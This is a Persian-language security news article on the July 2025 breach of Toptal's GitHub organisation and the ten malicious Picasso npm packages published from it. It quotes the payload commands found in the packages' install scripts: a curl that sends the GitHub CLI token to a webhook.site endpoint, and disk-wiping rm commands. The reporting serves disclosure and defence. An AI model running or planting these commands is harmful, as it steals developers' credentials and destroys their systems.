سه شنبه / ۱۵ مهر / ۱۴۰۴ Tuesday / 7 October / 2025
×
هک GitHub تپ‌تال: انتشار ۱۰ بسته npm مخرب با دانلود بیش از ۵٬۰۰۰ بار
نفوذ به GitHub تپ‌تال و انتشار بسته‌های مخرب npm

هک GitHub تپ‌تال: انتشار ۱۰ بسته npm مخرب با دانلود بیش از ۵٬۰۰۰ بار

ارزیابی سریع نفوذ: معرفی و بررسی THOR APT Scanner
ابزاری برای ارزیابی فوری نفوذ و تشخیص تهدیدات فعال

ارزیابی سریع نفوذ: معرفی و بررسی THOR APT Scanner

نفوذ به GitHub تپ‌تال و انتشار بسته‌های مخرب npm

هک GitHub تپ‌تال: انتشار ۱۰ بسته npm مخرب با دانلود بیش از ۵٬۰۰۰ بار

سازمان GitHub تپ‌تال در ۲۰ ژوئیه ۲۰۲۵ مورد نفوذ قرار گرفت؛ مهاجمان از دسترسی استفاده کرده و ۱۰ بسته مخرب را با کارکردهای سرقت توکن و پاک‌سازی سیستم منتشر کردند. این بسته‌ها تقریباً ۵٬۰۰۰ بار دانلود شدند پیش از اینکه حذف شوند.
هک GitHub تپ‌تال: انتشار ۱۰ بسته npm مخرب با دانلود بیش از ۵٬۰۰۰ بار

در این رخداد امنیتی، مهاجمان دسترسی سازمانی GitHub تپ‌تال را در تاریخ ۲۰ جولای ۲۰۲۵ به‌دست آوردند و ۱۰ بسته npm متعلق به Picasso را آلوده کردند. payloadهای قرار داده‌شده در package.json شامل اسکریپت‌هایی است که ابتدا توکن GitHub را استخراج و ارسال کرده، و سپس سیستم قربانی را به‌صورت کامل پاک می‌کنند. این بسته‌ها در حدود ۵٬۰۰۰ بار دانلود شدند و پس از سه روز حذف شدند، اما تپ‌تال هنوز اطلاع‌رسانی به کاربران انجام نداده است.

در تاریخ ۲۰ ژوئیه ۲۰۲۵، حمله‌ای از نوع supply‑chain علیه تپ‌تال رخ داد. مهاجمان توانستند حساب سازمان GitHub این شرکت را هک کرده و به ۷۳ مخزن دسترسی پیدا کنند. در کمتر از پنج دقیقه، تمام این مخازن به حالت عمومی تغییر یافتند و کدهای حساس شرکت در معرض دید قرار گرفت.

بیش از ۱۰ بسته‌ای که مربوط به طراحی سیستم Picasso بودند (مانند @toptal/picasso‑tailwind, picasso‑forms, picasso‑charts و غیره)، آلوده شده و در npm منتشر شدند. این بسته‌ها به‌عنوان نسخه‌هایی قانونی و رسمی از تپ‌تال منتشر شدند.

payloadهای مخرب در فایل‌های package.json قرار داشتند: اسکریپت preinstall توکن GitHub CLI را با فرمان curl -d "$(gh auth token)" https://webhook.site/... استخراج و به endpoint مهاجم ارسال می‌کند و اسکریپت postinstall پس از آن سیستم فایل را با دستوراتی مانند sudo rm -rf --no-preserve-root / یا rm /s /q روی ویندوز پاک می‌کند

تقریباً ۵٬۰۰۰ توسعه‌دهنده این بسته‌ها را نصب کردند، قبل از آن‌که مخرب بودن آن‌ها شناسایی و بسته‌ها حذف شوند. این موضوع نگرانی‌های گسترده‌ای درباره اعتماد به بسته‌های منبع‌باز رسمی ایجاد کرده است.

تپ‌تال در تاریخ ۲۳ جولای بسته‌های مخرب را deprecated کرده و به نسخه سالم بازگشت، اما هنوز هیچ اطلاع‌رسانی عمومی در خصوص کاربران در معرض خطر نداده است. محققان توصیه کردند کاربران در صورت نصب این نسخه‌ها، به نسخه‌های قبلی بازگردند، توکن‌های GitHub را بازنشانی کنند و سیستم را برای شواهد پاک‌سازی بررسی نمایند.

 

The Hacker News – Hackers Breach Toptal GitHub, Publish 10 Malicious npm Packages

Socket Threat Research Team – گزارش حمله و تحلیل payload

Ars Technica – تحلیل گسترده حملات زنجیره‌ای npm

 

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *